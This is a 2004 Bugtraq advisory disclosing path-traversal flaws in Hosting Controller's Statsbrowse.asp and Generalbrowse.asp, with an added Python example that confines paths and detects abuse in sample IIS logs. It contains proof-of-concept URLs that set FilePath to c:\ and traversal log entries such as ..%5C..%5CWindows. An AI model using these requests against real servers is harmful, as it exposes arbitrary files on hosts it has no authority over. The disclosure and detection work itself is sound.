Hosting Controller

From: mouse small (e_b_i_at_yahoo.com)
Date: 12/05/04

    Date: 5 Dec 2004 17:42:04 -0000
    To: bugtraq@securityfocus.com

                                           -= Security Advisory =-

    Advisory Information
    -------------------------

    Software Package : Hosting Controller
    Vendor Homepage : http://www.hostingcontroller.com
    Platforms : Windows based servers
    Vulnerable Versions: All versions (tested on v6.1 Hotfix 1.4)
    Vendor Contacted : 12/5/2004
    Release Date: : 12/7/2004

    Summary
    ------------

    Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform.
    Hosting Controller has a security flaw which allows attackers to browse any file and any directory on that server.

    Details
    ---------

    Vulnerability: browsing arbitrary directories and files on the server.
    A trivial vulnerability:

    1) The first flaw is in admin/mail/Statsbrowse.asp; the FilePath parameter is not restricted, so a logged-in user can browse the whole hard disk through this file.
    Login with your account
    http://www.yoursite.com/admin
    Now you see
    http://www.yoursite.com/admin/main.asp
    Change this url to
    http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0

    2) The second flaw is in admin/iis/Generalbrowse.asp; the FilePath parameter is likewise unrestricted, so a logged-in user can browse the whole hard disk through this file.
    Login with your account
    http://www.yoursite.com/admin
    Now you see
    http://www.yoursite.com/admin/main.asp
    Change this url to
    http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\
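    The root cause in both pages is the same: a user-supplied FilePath is handed to the file system without being confined to the directory the page is meant to expose. The following Python is an added example (not Hosting Controller code, which is Classic ASP) that shows the confinement check such a page needs, using ntpath so the Windows path semantics hold on any host, and a small detector that runs the same check over constructed IIS W3C-style log lines for both Statsbrowse.asp and Generalbrowse.asp. The base directory C:\HC\Stats and the log lines are assumptions made up for the example.

```python
"""Added example: confine a FilePath parameter to a base directory and
flag log entries for the two browse pages whose FilePath escapes it."""
import ntpath
from urllib.parse import parse_qs

# Hypothetical directory the stats browser is supposed to expose.
STATS_BASE = r"C:\HC\Stats"

# The two affected pages named in the advisory (matched case-insensitively).
BROWSE_PAGES = ("/statsbrowse.asp", "/generalbrowse.asp")


def resolve_confined(base: str, requested: str):
    """Return the normalized Windows path for `requested` only if it stays
    under `base`; otherwise return None.

    ntpath.join() replaces the base when `requested` is absolute (c:\\) or
    rooted (\\Windows), and ntpath.normpath() collapses '..' sequences, so
    every escape attempt ends up outside `base` and is rejected by the
    prefix comparison. normcase() makes the comparison case-insensitive,
    as the Windows file system is.
    """
    base_norm = ntpath.normcase(ntpath.normpath(base))
    candidate = ntpath.normpath(ntpath.join(base, requested))
    cand_norm = ntpath.normcase(candidate)
    if cand_norm == base_norm or cand_norm.startswith(base_norm + "\\"):
        return candidate
    return None


def parse_iis_line(line: str):
    """Parse one constructed W3C-style line with the fields
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, _method, stem, query, status = parts
    return {"ip": ip, "stem": stem, "query": query, "status": status}


def find_browse_abuse(log_text: str, base: str):
    """Return (client ip, page, FilePath) for every request to a browse page
    whose decoded FilePath does not resolve inside `base`."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None or not rec["stem"].lower().endswith(BROWSE_PAGES):
            continue
        # parse_qs percent-decodes, so %5C becomes a backslash before the check.
        params = parse_qs(rec["query"], keep_blank_values=True)
        for file_path in params.get("FilePath", []):
            if resolve_confined(base, file_path) is None:
                hits.append((rec["ip"], rec["stem"], file_path))
    return hits


# Constructed sample log: one normal stats request and two escapes.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-12-05 17:40:01 192.0.2.10 GET /admin/main.asp - 200
2004-12-05 17:40:09 192.0.2.10 GET /admin/mail/Statsbrowse.asp FilePath=site1%5Cstats.log&Opt=3&level=1&upflag=0 200
2004-12-05 17:42:04 192.0.2.20 GET /admin/mail/Statsbrowse.asp FilePath=c:%5C&Opt=3&level=1&upflag=0 200
2004-12-05 17:43:11 192.0.2.20 GET /admin/iis/Generalbrowse.asp FilePath=..%5C..%5CWindows 200
"""

if __name__ == "__main__":
    for ip, page, file_path in find_browse_abuse(SAMPLE_LOG, STATS_BASE):
        print(f"{ip} requested {page} with FilePath outside base: {file_path!r}")
```

    The same resolve_confined() check is what the patched pages must perform before touching the file system; the prefix comparison is done on the normalized path, never on the raw parameter, because the raw value can be absolute, rooted, or contain '..' and still look harmless.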

    Solution
    ----------

    The vendor was notified and has released a patch.
    Update your software.

    Credits
    ---------

    Discovered on May 6, 2004 by (\/) Mouse
    Mouse@Shabgard.org
    Additional Research: s7az2mm and bl2k
    http://Shabgard.org

    References
    -------------

    http://isun.Shabgard.org/hc.html
    http://isun.Shabgard.org/hc.txt

